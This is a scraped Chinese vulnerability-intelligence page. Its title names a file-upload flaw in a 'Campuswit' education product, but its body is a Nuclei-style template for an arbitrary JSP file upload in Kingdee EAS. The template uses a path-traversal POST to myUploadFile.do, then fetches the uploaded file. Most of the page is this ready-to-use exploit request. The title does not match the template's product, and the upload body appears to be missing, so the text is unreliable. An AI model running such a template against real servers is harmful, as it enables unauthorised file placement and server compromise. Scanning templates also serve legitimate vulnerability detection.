【漏洞情报 | 您所在的位置:网站首页 › 1day慧学教育科技有限公司Campuswit任意文件上传漏洞 › 【漏洞情报 |
id: Kingdee-EAS-myUploadFile info: name: Kingdee-EAS-myUploadFile author: 4Zen severity: high variables: file_name: "{{to_lower(rand_text_alpha(6))}}.jsp" http: - raw: - | POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: */* Accept-Language: en Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx Content-Length: 211 ------WebKitFormBoundarySq4lDnabv8CwHfvx Content-Disposition: form-data; name="myFile"; filename="{{file_name}}" Content-Type: text/html ------WebKitFormBoundarySq4lDnabv8CwHfvx-- - | GET /easportal/buffalo/../{{file_name}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "UploadTest")' condition: and |
CopyRight 2018-2019 实验室设备网 版权所有 |